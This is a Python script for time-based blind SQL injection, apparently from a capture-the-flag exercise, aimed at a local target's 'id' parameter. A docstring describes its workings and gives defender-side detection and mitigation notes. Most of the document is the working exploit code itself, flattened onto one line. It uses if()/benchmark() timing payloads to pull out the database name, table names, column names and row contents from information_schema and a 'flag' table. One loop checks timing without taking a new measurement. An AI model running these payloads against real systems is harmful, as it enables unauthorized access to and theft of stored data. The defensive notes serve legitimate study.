sql注入------基於時間延遲benchmark函式注入指令碼
"""Time-based blind SQL injection probe against a lab target hard-coded as http://127.0.0.1/?id=.

How the script works, as written:
  * Every request appends `if(<condition>, benchmark(1000000, md5('test')), NULL)` to the
    `id` parameter and times the round trip with `requests.Response.elapsed`; a response
    slower than 1.5 seconds is read as "condition true". The threshold is a fixed constant,
    so results depend on the network and server latency of the lab setup.
  * main(): length of `database()` and then its characters one position at a time.
  * guess_table(): count, length and name of every table in the current schema
    (information_schema.tables where table_schema=database()), then calls
    guess_column('flag').
  * guess_column(table): count, length and name of every column of `table`
    (information_schema.columns), then the row count via `select count(<first column>)`,
    then length and characters of each row value per column, printed as a grid.
  * Characters are guessed from the fixed alphabet in `payloads`
    (lower-case letters, `{`, `}`, `_`, digits); anything outside it is not recoverable.

Defender-side notes (risk, detection, mitigation):
  * The injection point is the `id` query parameter concatenated into SQL. A parameterised
    query, or rejecting any `id` that is not a plain integer, removes the oracle entirely.
  * Footprint in access logs: a burst of requests to one endpoint whose `id` value contains
    `if(`, `benchmark(`, `substr(` or `information_schema`, with a bimodal response-latency
    distribution (here ~1.5 s vs. normal). Logging the full query string plus per-request
    latency is enough to surface it; rate limiting and a server-side statement time cap
    blunt the timing side channel.

NOTE(review): the page captured this script with its line structure collapsed, so the
indentation (and therefore the exact loop nesting) cannot be recovered from what is shown;
the code is kept verbatim below rather than reformatted. Style observations only:
`list` shadows the builtin in guess_column/guess_table, and `string` is assigned but
never used in those two functions.
"""
import requests urlx = 'http://127.0.0.1/?id= 1 and if((substr((select database()),' payloads = 'qwertyuiopasdfghjklzxcvbnm{}_0123456789' def guess_column(table): string = '' extend = 0 list = [] length2 = 0 num = [] num1 = [] url1 = 'http://127.0.0.1/?id= 1 and if(((select count(column_name) from information_schema.columns where table_name=\''+ table + '\')=' url2 = 'http://127.0.0.1/?id= 1 and if((substr((select column_name from information_schema.columns where table_name=\'' + table + '\' limit ' url3 = 'http://127.0.0.1/?id= 1 and if(((select length(column_name) from information_schema.columns where table_name=\'' + table + '\' limit 'url4 = 'http://127.0.0.1/?id= 1 and if(((substr((select ' url5 = 'http://127.0.0.1/?id= 1 and if(((select count(' url7 = 'http://127.0.0.1/?id= 1 and if(((select length(' for i in range(50): # column count url = url1 + str(i) + '),benchmark(1000000,md5(\'test\')),NULL); %23' r = requests.get(url) print(url) time = r.elapsed.total_seconds() print(time) if time > 1.5: extend = i length2 = i break for k in range(extend): st = '' extend1 = 0 for m in range(100): url = url3 + str(k) + ',1)=' + str(m) + '),benchmark(1000000,md5(\'test\')),NULL); %23' # column-name length r = requests.get(url) if time > 1.5: extend1 = m break for i in range(1,extend1+1): # column name for payload in payloads: url = url2 + str(k) + ',1),' + str(i) + ',1)=\'' + payload + '\'),benchmark(1000000,md5(\'test\')),NULL); %23' r = requests.get(url) time = r.elapsed.total_seconds() if time > 1.5: print(url) st += payload break list.append(st) num1.append(st) length = 0 for i in range(1,10000): # row count url = url5 + str(num1[0]) + ') from ' + table + ')=' + str(i) + '),benchmark(1000000,md5(\'test\')),NULL); %23' print(url) r = requests.get(url) time = r.elapsed.total_seconds() if time > 1.5: length = i break for column in list: str1 = '' for i in range(length): length1 = 0 url6 = url4 + str(column) + ' from ' + table + ' limit ' + str(i) for k in range(100): # row-value length url = url7 + str(column) + 
') from '+ table + ' limit ' + str(i) + ',1)=' + str(k) + '),benchmark(1000000,md5(\'test\')),NULL); %23' r = requests.get(url) time = r.elapsed.total_seconds() if time > 1.5: print(url) length1 = k break for n in range(1,length1+1): # row value for payload in payloads: url = url6 + ',1),' + str(n) + ',1))=\'' + str(payload) + '\'),benchmark(1000000,md5(\'test\')),NULL); %23' r = requests.get(url) time = r.elapsed.total_seconds() if time > 1.5: print(url) str1 += payload break num.append(str1) str1 = '' for column in num1: print(column+' ',end='') print('\n',end='') for i in range(length2): for k in range(length): x = i + length * k print(num[x]+' ',end='') print('\n',end='') def guess_table(): string = '' extend = 0 list = [] url1 = 'http://127.0.0.1/?id= 1 and if(((select count(table_name) from information_schema.tables where table_schema=database())=' url2 = 'http://127.0.0.1/?id= 1 and if((substr((select table_name from information_schema.tables where table_schema=database() limit ' url3 = 'http://127.0.0.1/?id= 1 and if(((select length(table_name) from information_schema.tables where table_schema=database() limit ' for i in range(50): url = url1 + str(i) + '),benchmark(1000000,md5(\'test\')),NULL); %23' r = requests.get(url) time = r.elapsed.total_seconds() if time > 1.5: extend = i break for k in range(extend): st = '' extend1 = 0 for m in range(100): url = url3 + str(k) + ',1)=' + str(m) + '),benchmark(1000000,md5(\'test\')),NULL); %23' r = requests.get(url) time = r.elapsed.total_seconds() if time > 1.5: extend1 = m break for i in range(1,extend1+1): for payload in payloads: url = url2 + str(k) + ',1),' + str(i) + ',1)=\'' + payload + '\'),benchmark(1000000,md5(\'test\')),NULL); %23' r = requests.get(url) time = r.elapsed.total_seconds() if time > 1.5: st += payload break list.append(st) print('------------') for i in list: print(f'[*]{i}') print('------------') guess_column('flag') def main(): string = '' url1 = 'http://127.0.0.1/?id= 1 and 
if((length(database())=' extend = 0 for k in range(20): url = url1 + str(k) + '),benchmark(1000000,md5(\'test\')),NULL); %23' r = requests.get(url) time = r.elapsed.total_seconds() if time > 1.5: extend = k break for i in range(1,extend+1): for payload in payloads: url = urlx + str(i) + ',1)=\'' url = url + payload + '\'),benchmark(1000000,md5(\'test\')),NULL); %23' r = requests.get(url) time = r.elapsed.total_seconds() if time > 1.5: string += payload break print(f'available database\n[*] {string}') guess_table() main()